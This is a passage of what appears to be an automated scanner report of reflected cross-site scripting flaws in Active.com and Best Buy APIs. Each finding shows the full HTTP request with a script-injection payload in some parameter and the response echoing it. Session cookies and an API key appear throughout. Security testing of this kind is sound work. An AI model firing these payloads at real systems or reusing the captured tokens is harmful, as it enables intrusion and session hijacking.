HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:20:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/json; charset=utf-8
Content-Length: 172

OX.AJAST.__callbacks__.callback376cc7<script>alert(1)</script>76faf0c8b84({"ZipCode":"75244","Latitude":"32.9366","Longitude":"-96.83800","DmaName":"Dallas - Fort Worth"});

4.3. http://api.active.com/REST/geotargeting/handler.ashx [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.active.com
Path:	/REST/geotargeting/handler.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9953f<script>alert(1)</script>8b150904b00 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /REST/geotargeting/handler.ashx?output=json&callback=OX.AJAST.__callbacks__.callback19953f<script>alert(1)</script>8b150904b00 HTTP/1.1
Host: api.active.com
Proxy-Connection: keep-alive
Referer: http://www.active.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mdr_browser=desktop; mbox=check#true#1314814843|session#1314814782356-141992#1314816643

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:20:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 248

OX.AJAST.__callbacks__.callback19953f<script>alert(1)</script>8b150904b00({
"location": {
"zip": "75244",
"city": "DALLAS",
"region": "TEXAS",
"country": "US",
"latitude": "32.7961",
"longitude": "-96.8024"
}
})

4.4. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bbyremix.bestbuy.com
Path:	/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 41be8<script>alert(1)</script>a2b3fb1c730 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v141be8<script>alert(1)</script>a2b3fb1c730/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "c249f30611bc95d631a0e432ffe6fe95"
X-Runtime: 1
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Thu, 11 Aug 2011 23:47:29 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v141be8<script>alert(1)</script>a2b3fb1c730/products(digitalSku>
...[SNIP]...

4.5. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bbyremix.bestbuy.com
Path:	/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c0e2<script>alert(1)</script>a5010c4844b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%225c0e2<script>alert(1)</script>a5010c4844b&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "87206ffb76a3962125256ec1d025e43c"
X-Runtime: 2
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Thu, 11 Aug 2011 23:47:31 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(digitalSku>\"\"5c0e2<script>alert(1)</script>a5010c4844b&sku in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json'",
"status": "400 Bad Request"
}

...[SNIP]...

4.6. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bbyremix.bestbuy.com
Path:	/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a72bd<script>alert(1)</script>f8c76327bfb was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATICa72bd<script>alert(1)</script>f8c76327bfb&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web3.ATL
Etag: "ea0512bd5b72bf72e903baee31b4adcc"
X-Runtime: 27
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 405
Date: Thu, 11 Aug 2011 23:47:19 GMT

SDSTATICa72bd<script>alert(1)</script>f8c76327bfb({
"queryTime": "0.007",
"currentPage": 1,
"totalPages": 0,
"partial": false,
"from": 1,
"total": 0,
"to": 0,
"products": [

],
"canonicalUrl": "/v1/products(digitalSku>
...[SNIP]...

4.7. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bbyremix.bestbuy.com
Path:	/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 286a6<script>alert(1)</script>220fe19ac5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json&286a6<script>alert(1)</script>220fe19ac5d=1 HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "d819595c8f6b5189ddd1afee9b4ff855"
X-Runtime: 5
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2393
Date: Thu, 11 Aug 2011 23:47:27 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
nderstand '/v1/products(digitalSku>\"\"&sku in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json&286a6<script>alert(1)</script>220fe19ac5d=1'",
"status": "400 Bad Request"
}
})

4.8. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [pageSize parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bbyremix.bestbuy.com
Path:	/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The value of the pageSize request parameter is copied into the HTML document as plain text between tags. The payload 33863<script>alert(1)</script>d7fd7ee2f10 was submitted in the pageSize parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=9933863<script>alert(1)</script>d7fd7ee2f10&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "e8382132aec443124d5e36b9cead5d75"
X-Runtime: 4
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Thu, 11 Aug 2011 23:47:21 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
: "Couldn't understand '/v1/products(digitalSku>\"\"&sku in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=9933863<script>alert(1)</script>d7fd7ee2f10&format=json'",
"status": "400 Bad Request"
}
})

4.9. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [show parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bbyremix.bestbuy.com
Path:	/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The value of the show request parameter is copied into the HTML document as plain text between tags. The payload 7bf34<script>alert(1)</script>10daab6be was submitted in the show parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku7bf34<script>alert(1)</script>10daab6be&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
